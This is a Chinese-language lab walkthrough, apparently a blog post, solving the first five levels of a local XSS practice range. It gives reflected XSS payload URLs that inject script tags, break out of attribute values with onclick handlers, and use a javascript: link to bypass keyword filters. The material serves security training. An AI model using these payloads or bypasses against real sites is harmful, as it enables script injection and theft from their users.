1. Level1-标签中无过滤

提交正常数据，字符串xss，判断请求方式为GET请求，字符回显在h2标签内。

我们测试直接插入脚本<script>标签。

http://127.0.0.1:8005/level1.php?name=<script>alert(1);</script>

 代码成功注入HTML页面中。

代码:

2. Level2-属性值(双引号闭合)无过滤

提交正常数据，依然时GET请求方式，数据回显在input的value属性中。

我们可以尝试引入事件，或者闭合标签引入脚本。

引入事件：

http://127.0.0.1:8005/level2.php?keyword=" onclick="alert(1)

 成功触发XSS。

闭合标签，引入脚本：

http://127.0.0.1:8005/level2.php?keyword="><script>alert(1);</script>

XSS成触发。

代码：

3. Level3-属性值(单引号闭合)无过滤

正常提交数据，请求方式为GET，数据回显在intpu的value中。

我们使用引入事件的方法：

但无法闭合属性值的引号。

我们右击查看源代码。发现是单引号闭合，我们使用单引号闭合。

http://127.0.0.1:8005/level3.php?keyword=' onclick='alert(1)

成功闭合，触发XSS。

代码：

4. Level4-过滤<>

请求方式为GET，数据回显在input的value属性中。

我们闭合标签，引入脚本。

http://127.0.0.1:8005/level4.php?keyword="> <script>alert(1);</script>

脚本的<>被过滤，替换为空。 

我们尝试闭合双引号(")，双引号和字符加空格。

http://127.0.0.1:8005/level4.php?keyword=" xss

发现xss被作为属性名了，我们可以引入时间触发XSS。

http://127.0.0.1:8005/level4.php?keyword=" onclick="alert(1)

 成功引入事件，并触发XSS。

代码：

5. Level5-过滤关键词<script/on

提交访问为GET，数据回显在intput标签的value中。 

我们闭合标签，插入脚本：

http://127.0.0.1:8005/level5.php?keyword="><script>alert(1);</script>

其中的script被替换为scr_ipt。

我们尝试引入事件。

http://127.0.0.1:8005/level5.php?keyword=" onclick="alert(1)

但是on被过滤为o_n。

我们使用javascript伪协议绕过。

http://127.0.0.1:8005/level5.php?keyword=">  <a href=javascript:alert(1)>

点击a标签，XSS成功触发。 

代码：

标签：XSS,127.0,http,keyword,0.1,Labs,8005,靶场,php
来源： https://blog.csdn.net/qq_40929683/article/details/120378140